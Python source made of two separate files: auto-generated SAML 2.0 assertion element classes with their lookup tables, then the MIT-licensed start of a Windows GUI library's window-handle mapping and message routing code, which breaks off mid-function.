class SubjectConfirmationType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationType
element """
c_tag = 'SubjectConfirmationType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id',
BaseID)
c_cardinality['base_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id',
NameID)
c_cardinality['name_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = (
'encrypted_id',
EncryptedID)
c_cardinality['encrypted_id'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData'] = (
'subject_confirmation_data', SubjectConfirmationData)
c_cardinality['subject_confirmation_data'] = {"min": 0, "max": 1}
c_attributes['Method'] = ('method', 'anyURI', True)
c_child_order.extend(['base_id', 'name_id', 'encrypted_id',
'subject_confirmation_data'])
def __init__(self,
base_id=None,
name_id=None,
encrypted_id=None,
subject_confirmation_data=None,
method=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.base_id = base_id
self.name_id = name_id
self.encrypted_id = encrypted_id
self.subject_confirmation_data = subject_confirmation_data
self.method = method
def subject_confirmation_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationType_,
xml_string)
class AudienceRestriction(AudienceRestrictionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestriction element """
c_tag = 'AudienceRestriction'
c_namespace = NAMESPACE
c_children = AudienceRestrictionType_.c_children.copy()
c_attributes = AudienceRestrictionType_.c_attributes.copy()
c_child_order = AudienceRestrictionType_.c_child_order[:]
c_cardinality = AudienceRestrictionType_.c_cardinality.copy()
def audience_restriction_from_string(xml_string):
return saml2.create_class_from_xml_string(AudienceRestriction, xml_string)
class AuthnContext(AuthnContextType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContext element """
c_tag = 'AuthnContext'
c_namespace = NAMESPACE
c_children = AuthnContextType_.c_children.copy()
c_attributes = AuthnContextType_.c_attributes.copy()
c_child_order = AuthnContextType_.c_child_order[:]
c_cardinality = AuthnContextType_.c_cardinality.copy()
def authn_context_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContext, xml_string)
class Attribute(AttributeType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Attribute element """
c_tag = 'Attribute'
c_namespace = NAMESPACE
c_children = AttributeType_.c_children.copy()
c_attributes = AttributeType_.c_attributes.copy()
c_child_order = AttributeType_.c_child_order[:]
c_cardinality = AttributeType_.c_cardinality.copy()
def attribute_from_string(xml_string):
return saml2.create_class_from_xml_string(Attribute, xml_string)
class SubjectConfirmation(SubjectConfirmationType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmation element """
c_tag = 'SubjectConfirmation'
c_namespace = NAMESPACE
c_children = SubjectConfirmationType_.c_children.copy()
c_attributes = SubjectConfirmationType_.c_attributes.copy()
c_child_order = SubjectConfirmationType_.c_child_order[:]
c_cardinality = SubjectConfirmationType_.c_cardinality.copy()
def subject_confirmation_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmation, xml_string)
class ConditionsType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ConditionsType element """
c_tag = 'ConditionsType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Condition'] = (
'condition',
[Condition])
c_cardinality['condition'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction'] = (
'audience_restriction',
[AudienceRestriction])
c_cardinality['audience_restriction'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}OneTimeUse'] = (
'one_time_use',
[OneTimeUse])
c_cardinality['one_time_use'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}ProxyRestriction'] = (
'proxy_restriction',
[ProxyRestriction])
c_cardinality['proxy_restriction'] = {"min": 0}
c_attributes['NotBefore'] = ('not_before', 'dateTime', False)
c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False)
c_child_order.extend(['condition', 'audience_restriction', 'one_time_use',
'proxy_restriction'])
def __init__(self,
condition=None,
audience_restriction=None,
one_time_use=None,
proxy_restriction=None,
not_before=None,
not_on_or_after=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.condition = condition or []
self.audience_restriction = audience_restriction or []
self.one_time_use = one_time_use or []
self.proxy_restriction = proxy_restriction or []
self.not_before = not_before
self.not_on_or_after = not_on_or_after
def verify(self):
if self.one_time_use:
assert len(self.one_time_use) == 1
if self.proxy_restriction:
assert len(self.proxy_restriction) == 1
return SamlBase.verify(self)
def conditions_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ConditionsType_, xml_string)
class AuthnStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatementType element """
c_tag = 'AuthnStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectLocality'] = (
'subject_locality', SubjectLocality)
c_cardinality['subject_locality'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext'] = (
'authn_context', AuthnContext)
c_attributes['AuthnInstant'] = ('authn_instant', 'dateTime', True)
c_attributes['SessionIndex'] = ('session_index', 'string', False)
c_attributes['SessionNotOnOrAfter'] = ('session_not_on_or_after',
'dateTime', False)
c_child_order.extend(['subject_locality', 'authn_context'])
def __init__(self,
subject_locality=None,
authn_context=None,
authn_instant=None,
session_index=None,
session_not_on_or_after=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.subject_locality = subject_locality
self.authn_context = authn_context
self.authn_instant = authn_instant
self.session_index = session_index
self.session_not_on_or_after = session_not_on_or_after
def authn_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnStatementType_, xml_string)
class AttributeStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatementType
element """
c_tag = 'AttributeStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'] = (
'attribute',
[Attribute])
c_cardinality['attribute'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAttribute'] = (
'encrypted_attribute',
[EncryptedAttribute])
c_cardinality['encrypted_attribute'] = {"min": 0}
c_child_order.extend(['attribute', 'encrypted_attribute'])
def __init__(self,
attribute=None,
encrypted_attribute=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.attribute = attribute or []
self.encrypted_attribute = encrypted_attribute or []
def attribute_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeStatementType_,
xml_string)
class SubjectType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectType element """
c_tag = 'SubjectType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id',
BaseID)
c_cardinality['base_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id',
NameID)
c_cardinality['name_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = (
'encrypted_id', EncryptedID)
c_cardinality['encrypted_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation'] = (
'subject_confirmation', [SubjectConfirmation])
c_cardinality['subject_confirmation'] = {"min": 0}
c_child_order.extend(['base_id', 'name_id', 'encrypted_id',
'subject_confirmation'])
def __init__(self,
base_id=None,
name_id=None,
encrypted_id=None,
subject_confirmation=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.base_id = base_id
self.name_id = name_id
self.encrypted_id = encrypted_id
self.subject_confirmation = subject_confirmation or []
def subject_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectType_, xml_string)
class Conditions(ConditionsType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Conditions element """
c_tag = 'Conditions'
c_namespace = NAMESPACE
c_children = ConditionsType_.c_children.copy()
c_attributes = ConditionsType_.c_attributes.copy()
c_child_order = ConditionsType_.c_child_order[:]
c_cardinality = ConditionsType_.c_cardinality.copy()
def conditions_from_string(xml_string):
return saml2.create_class_from_xml_string(Conditions, xml_string)
class AuthnStatement(AuthnStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatement element """
c_tag = 'AuthnStatement'
c_namespace = NAMESPACE
c_children = AuthnStatementType_.c_children.copy()
c_attributes = AuthnStatementType_.c_attributes.copy()
c_child_order = AuthnStatementType_.c_child_order[:]
c_cardinality = AuthnStatementType_.c_cardinality.copy()
def authn_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnStatement, xml_string)
class AttributeStatement(AttributeStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatement element """
c_tag = 'AttributeStatement'
c_namespace = NAMESPACE
c_children = AttributeStatementType_.c_children.copy()
c_attributes = AttributeStatementType_.c_attributes.copy()
c_child_order = AttributeStatementType_.c_child_order[:]
c_cardinality = AttributeStatementType_.c_cardinality.copy()
def attribute_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeStatement, xml_string)
class Subject(SubjectType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Subject element """
c_tag = 'Subject'
c_namespace = NAMESPACE
c_children = SubjectType_.c_children.copy()
c_attributes = SubjectType_.c_attributes.copy()
c_child_order = SubjectType_.c_child_order[:]
c_cardinality = SubjectType_.c_cardinality.copy()
def subject_from_string(xml_string):
return saml2.create_class_from_xml_string(Subject, xml_string)
#..................
# ['AuthzDecisionStatement', 'EvidenceType', 'AdviceType', 'Evidence',
# 'Assertion', 'AssertionType', 'AuthzDecisionStatementType', 'Advice']
class EvidenceType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EvidenceType element """
c_tag = 'EvidenceType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = (
'assertion_id_ref', [AssertionIDRef])
c_cardinality['assertion_id_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = (
'assertion_uri_ref', [AssertionURIRef])
c_cardinality['assertion_uri_ref'] = {"min": 0}
c_cardinality['assertion'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = (
'encrypted_assertion', [EncryptedAssertion])
c_cardinality['encrypted_assertion'] = {"min": 0}
c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion',
'encrypted_assertion'])
def __init__(self,
assertion_id_ref=None,
assertion_uri_ref=None,
assertion=None,
encrypted_assertion=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.assertion_id_ref = assertion_id_ref or []
self.assertion_uri_ref = assertion_uri_ref or []
self.assertion = assertion or []
self.encrypted_assertion = encrypted_assertion or []
def evidence_type__from_string(xml_string):
return saml2.create_class_from_xml_string(EvidenceType_, xml_string)
class Evidence(EvidenceType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Evidence element """
c_tag = 'Evidence'
c_namespace = NAMESPACE
c_children = EvidenceType_.c_children.copy()
c_attributes = EvidenceType_.c_attributes.copy()
c_child_order = EvidenceType_.c_child_order[:]
c_cardinality = EvidenceType_.c_cardinality.copy()
def evidence_from_string(xml_string):
return saml2.create_class_from_xml_string(Evidence, xml_string)
class AuthzDecisionStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatementType
element """
c_tag = 'AuthzDecisionStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Action'] = (
'action', [Action])
c_cardinality['action'] = {"min": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Evidence'] = (
'evidence', Evidence)
c_cardinality['evidence'] = {"min": 0, "max": 1}
c_attributes['Resource'] = ('resource', 'anyURI', True)
c_attributes['Decision'] = ('decision', DecisionType_, True)
c_child_order.extend(['action', 'evidence'])
def __init__(self,
action=None,
evidence=None,
resource=None,
decision=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.action = action or []
self.evidence = evidence
self.resource = resource
self.decision = decision
def authz_decision_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthzDecisionStatementType_,
xml_string)
class AuthzDecisionStatement(AuthzDecisionStatementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatement
element """
c_tag = 'AuthzDecisionStatement'
c_namespace = NAMESPACE
c_children = AuthzDecisionStatementType_.c_children.copy()
c_attributes = AuthzDecisionStatementType_.c_attributes.copy()
c_child_order = AuthzDecisionStatementType_.c_child_order[:]
c_cardinality = AuthzDecisionStatementType_.c_cardinality.copy()
def authz_decision_statement_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthzDecisionStatement,
xml_string)
#..................
# ['Assertion', 'AssertionType', 'AdviceType', 'Advice']
class AssertionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionType element """
c_tag = 'AssertionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Issuer'] = ('issuer',
Issuer)
c_children['{http://www.w3.org/2000/09/xmldsig#}Signature'] = ('signature',
ds.Signature)
c_cardinality['signature'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Subject'] = ('subject',
Subject)
c_cardinality['subject'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'] = (
'conditions', Conditions)
c_cardinality['conditions'] = {"min": 0, "max": 1}
c_cardinality['advice'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Statement'] = (
'statement', [Statement])
c_cardinality['statement'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement'] = (
'authn_statement', [AuthnStatement])
c_cardinality['authn_statement'] = {"min": 0}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthzDecisionStatement'] = (
'authz_decision_statement', [AuthzDecisionStatement])
c_cardinality['authz_decision_statement'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement'] = (
'attribute_statement', [AttributeStatement])
c_cardinality['attribute_statement'] = {"min": 0}
c_attributes['Version'] = ('version', 'string', True)
c_attributes['ID'] = ('id', 'ID', True)
c_attributes['IssueInstant'] = ('issue_instant', 'dateTime', True)
c_child_order.extend(['issuer', 'signature', 'subject', 'conditions',
'advice', 'statement', 'authn_statement',
'authz_decision_statement', 'attribute_statement'])
def __init__(self,
issuer=None,
signature=None,
subject=None,
conditions=None,
advice=None,
statement=None,
authn_statement=None,
authz_decision_statement=None,
attribute_statement=None,
version=None,
id=None,
issue_instant=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.issuer = issuer
self.signature = signature
self.subject = subject
self.conditions = conditions
self.advice = advice
self.statement = statement or []
self.authn_statement = authn_statement or []
self.authz_decision_statement = authz_decision_statement or []
self.attribute_statement = attribute_statement or []
self.version = version
self.id = id
self.issue_instant = issue_instant
def verify(self):
# If no statement MUST contain a subject element
if self.attribute_statement or self.statement or \
self.authn_statement or self.authz_decision_statement:
pass
elif not self.subject:
raise MustValueError(
"If no statement MUST contain a subject element")
if self.authn_statement and not self.subject:
raise MustValueError(
"An assertion with an AuthnStatement must contain a Subject")
return SamlBase.verify(self)
def assertion_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionType_, xml_string)
class Assertion(AssertionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Assertion element """
c_tag = 'Assertion'
c_namespace = NAMESPACE
c_children = AssertionType_.c_children.copy()
c_attributes = AssertionType_.c_attributes.copy()
c_child_order = AssertionType_.c_child_order[:]
c_cardinality = AssertionType_.c_cardinality.copy()
def assertion_from_string(xml_string):
return saml2.create_class_from_xml_string(Assertion, xml_string)
class AdviceType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AdviceType element """
c_tag = 'AdviceType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = (
'assertion_id_ref', [AssertionIDRef])
c_cardinality['assertion_id_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = (
'assertion_uri_ref', [AssertionURIRef])
c_cardinality['assertion_uri_ref'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
c_cardinality['assertion'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = (
'encrypted_assertion', [EncryptedAssertion])
c_cardinality['encrypted_assertion'] = {"min": 0}
c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion',
'encrypted_assertion'])
c_any = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
assertion_id_ref=None,
assertion_uri_ref=None,
assertion=None,
encrypted_assertion=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.assertion_id_ref = assertion_id_ref or []
self.assertion_uri_ref = assertion_uri_ref or []
self.assertion = assertion or []
self.encrypted_assertion = encrypted_assertion or []
def advice_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AdviceType_, xml_string)
class Advice(AdviceType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Advice element """
c_tag = 'Advice'
c_namespace = NAMESPACE
c_children = AdviceType_.c_children.copy()
c_attributes = AdviceType_.c_attributes.copy()
c_child_order = AdviceType_.c_child_order[:]
c_cardinality = AdviceType_.c_cardinality.copy()
def advice_from_string(xml_string):
return saml2.create_class_from_xml_string(Advice, xml_string)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
EvidenceType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
Evidence.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = (
'assertion', [Assertion])
AssertionType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = (
'advice', Advice)
Assertion.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = (
'advice', Advice)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
AG_IDNameQualifiers = [
('NameQualifier', 'string', False),
('SPNameQualifier', 'string', False),
]
ELEMENT_FROM_STRING = {
BaseID.c_tag: base_id_from_string,
NameID.c_tag: name_id_from_string,
NameIDType_.c_tag: name_id_type__from_string,
EncryptedElementType_.c_tag: encrypted_element_type__from_string,
EncryptedID.c_tag: encrypted_id_from_string,
Issuer.c_tag: issuer_from_string,
AssertionIDRef.c_tag: assertion_id_ref_from_string,
AssertionURIRef.c_tag: assertion_uri_ref_from_string,
Assertion.c_tag: assertion_from_string,
AssertionType_.c_tag: assertion_type__from_string,
Subject.c_tag: subject_from_string,
SubjectType_.c_tag: subject_type__from_string,
SubjectConfirmation.c_tag: subject_confirmation_from_string,
SubjectConfirmationType_.c_tag: subject_confirmation_type__from_string,
SubjectConfirmationData.c_tag: subject_confirmation_data_from_string,
SubjectConfirmationDataType_.c_tag:
subject_confirmation_data_type__from_string,
KeyInfoConfirmationDataType_.c_tag:
key_info_confirmation_data_type__from_string,
Conditions.c_tag: conditions_from_string,
ConditionsType_.c_tag: conditions_type__from_string,
Condition.c_tag: condition_from_string,
AudienceRestriction.c_tag: audience_restriction_from_string,
AudienceRestrictionType_.c_tag: audience_restriction_type__from_string,
Audience.c_tag: audience_from_string,
OneTimeUse.c_tag: one_time_use_from_string,
OneTimeUseType_.c_tag: one_time_use_type__from_string,
ProxyRestriction.c_tag: proxy_restriction_from_string,
ProxyRestrictionType_.c_tag: proxy_restriction_type__from_string,
Advice.c_tag: advice_from_string,
AdviceType_.c_tag: advice_type__from_string,
EncryptedAssertion.c_tag: encrypted_assertion_from_string,
Statement.c_tag: statement_from_string,
AuthnStatement.c_tag: authn_statement_from_string,
AuthnStatementType_.c_tag: authn_statement_type__from_string,
SubjectLocality.c_tag: subject_locality_from_string,
SubjectLocalityType_.c_tag: subject_locality_type__from_string,
AuthnContext.c_tag: authn_context_from_string,
AuthnContextType_.c_tag: authn_context_type__from_string,
AuthnContextClassRef.c_tag: authn_context_class_ref_from_string,
AuthnContextDeclRef.c_tag: authn_context_decl_ref_from_string,
AuthnContextDecl.c_tag: authn_context_decl_from_string,
AuthenticatingAuthority.c_tag: authenticating_authority_from_string,
AuthzDecisionStatement.c_tag: authz_decision_statement_from_string,
AuthzDecisionStatementType_.c_tag:
authz_decision_statement_type__from_string,
DecisionType_.c_tag: decision_type__from_string,
Action.c_tag: action_from_string,
ActionType_.c_tag: action_type__from_string,
Evidence.c_tag: evidence_from_string,
EvidenceType_.c_tag: evidence_type__from_string,
AttributeStatement.c_tag: attribute_statement_from_string,
AttributeStatementType_.c_tag: attribute_statement_type__from_string,
Attribute.c_tag: attribute_from_string,
AttributeType_.c_tag: attribute_type__from_string,
AttributeValue.c_tag: attribute_value_from_string,
EncryptedAttribute.c_tag: encrypted_attribute_from_string,
}
ELEMENT_BY_TAG = {
'BaseID': BaseID,
'NameID': NameID,
'NameIDType': NameIDType_,
'EncryptedElementType': EncryptedElementType_,
'EncryptedID': EncryptedID,
'Issuer': Issuer,
'AssertionIDRef': AssertionIDRef,
'AssertionURIRef': AssertionURIRef,
'Assertion': Assertion,
'AssertionType': AssertionType_,
'Subject': Subject,
'SubjectType': SubjectType_,
'SubjectConfirmation': SubjectConfirmation,
'SubjectConfirmationType': SubjectConfirmationType_,
'SubjectConfirmationData': SubjectConfirmationData,
'SubjectConfirmationDataType': SubjectConfirmationDataType_,
'KeyInfoConfirmationDataType': KeyInfoConfirmationDataType_,
'Conditions': Conditions,
'ConditionsType': ConditionsType_,
'Condition': Condition,
'AudienceRestriction': AudienceRestriction,
'AudienceRestrictionType': AudienceRestrictionType_,
'Audience': Audience,
'OneTimeUse': OneTimeUse,
'OneTimeUseType': OneTimeUseType_,
'ProxyRestriction': ProxyRestriction,
'ProxyRestrictionType': ProxyRestrictionType_,
'Advice': Advice,
'AdviceType': AdviceType_,
'EncryptedAssertion': EncryptedAssertion,
'Statement': Statement,
'AuthnStatement': AuthnStatement,
'AuthnStatementType': AuthnStatementType_,
'SubjectLocality': SubjectLocality,
'SubjectLocalityType': SubjectLocalityType_,
'AuthnContext': AuthnContext,
'AuthnContextType': AuthnContextType_,
'AuthnContextClassRef': AuthnContextClassRef,
'AuthnContextDeclRef': AuthnContextDeclRef,
'AuthnContextDecl': AuthnContextDecl,
'AuthenticatingAuthority': AuthenticatingAuthority,
'AuthzDecisionStatement': AuthzDecisionStatement,
'AuthzDecisionStatementType': AuthzDecisionStatementType_,
'DecisionType': DecisionType_,
'Action': Action,
'ActionType': ActionType_,
'Evidence': Evidence,
'EvidenceType': EvidenceType_,
'AttributeStatement': AttributeStatement,
'AttributeStatementType': AttributeStatementType_,
'Attribute': Attribute,
'AttributeType': AttributeType_,
'AttributeValue': AttributeValue,
'EncryptedAttribute': EncryptedAttribute,
'BaseIDAbstractType': BaseIDAbstractType_,
'ConditionAbstractType': ConditionAbstractType_,
'StatementAbstractType': StatementAbstractType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
|
|
## Copyright (c) 2003 Henk Punt
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the
## "Software"), to deal in the Software without restriction, including
## without limitation the rights to use, copy, modify, merge, publish,
## distribute, sublicense, and/or sell copies of the Software, and to
## permit persons to whom the Software is furnished to do so, subject to
## the following conditions:
## The above copyright notice and this permission notice shall be
## included in all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
from .windows import *
from ctypes import *
from .winuser import MAKEINTRESOURCE, LoadIcon, LoadCursor
import sys
import weakref
quit = False
class HandleMap(dict):
"""a special weakreference map for mapping window handles to python instances
when a python instance becomes garbage, the __dispose__ method of HandleMap
is called, deleting the handle from the map and freeing OS resources by calling
the method stored in the __dispose__ variable of the garbage python instance.
This latter method should be bound to a windows-free-routine corresponding to the
type of the handle"""
def freeze_method(self, fndisp, dbgstr):
def freeze_func(wref = 0, fndisp = fndisp, dbgstr = dbgstr):
self.__dispose__(handle, wref, fndisp, dbgstr)
return freeze_func
def __setitem__(self, handle, value):
# watch the lambda closure, freezing the binding of:
# - fndisp to the __dispose__ variable of the value object
# - handle to the provided windows-handle in the first actual parameter
lmdisp = lambda wr, fndisp = value.__dispose__, dbgstr = str(value.__class__): self.__dispose__(handle, wr, fndisp, dbgstr)
#lmdisp = self.freeze_method(value.__dispose__, str(value.__class__))
dict.__setitem__(self, handle, weakref.ref(value, lmdisp))
def __getitem__(self, handle):
return dict.__getitem__(self, handle)() # weak refs are 'called' to return the referred object
def get(self, k, d = None):
#~ if self.has_key(k):
if k in self:
return self[k]
else:
return d
def __dispose__(self, handle, wr, fndisp, dbgstr): # callback of weakref wr, called when wr() is garbage
global quit
self.__delitem__(handle)
if not quit:
try:
fndisp(handle)
except:
print(('ERROR HandleMap %d, %s, %s, %s' % (handle, repr(wr), repr(fndisp), dbgstr)))
hndlMap = HandleMap() #contains the mapping from python instances (of Window) to windows HANDLES
createHndlMap = {} #used while handling messages during CreateWindow(Ex)
def globalWndProc(hWnd, nMsg, wParam, lParam):
"""The purpose of globalWndProc is route messages coming in on the global queue
to the appropriate python Window instance for handling.
Also it establishes the mapping from python instances to window HANDLES by processing the WM_NCCREATE message
"""
try:
if nMsg == WM_NCCREATE:
#a venster window is being creaated trough CreateWindowEx,
#establish the mapping between the windows HANDLE and the Window instance
#the window instance is to be found in the createHndlMap by looking up
#the key that was given as a parameter to CreateWindowEx
#~ print createHndlMap
createStruct = CREATESTRUCT.from_address(int(lParam))
#~ window = createHndlMap.get(int(createStruct.lpCreateParams), None)
window = createHndlMap.get(createStruct.lpCreateParams, None)
#~ window = createHndlMap.get(cast(lParam, POINTER(CREATESTRUCT)).lpCreateParams, None)
if window:
#it is a venster window being created, establish the mapping:
WindowsObject.__init__(window, hWnd)
handled = False
result = None
window = hndlMap.get(hWnd, None)
if window:
#this is a known venster window, let the window process its own msgs
handled, result = window.WndProc(hWnd, nMsg, wParam, lParam)
if not handled and window._issubclassed_:
#its a subclassed window, try old window proc
result = CallWindowProc(window._old_wnd_proc_, hWnd, nMsg, wParam, lParam)
handled = True #always handled, either by old window proc, or old window proc called default handling
if not handled:
#still not handled, perform default processing
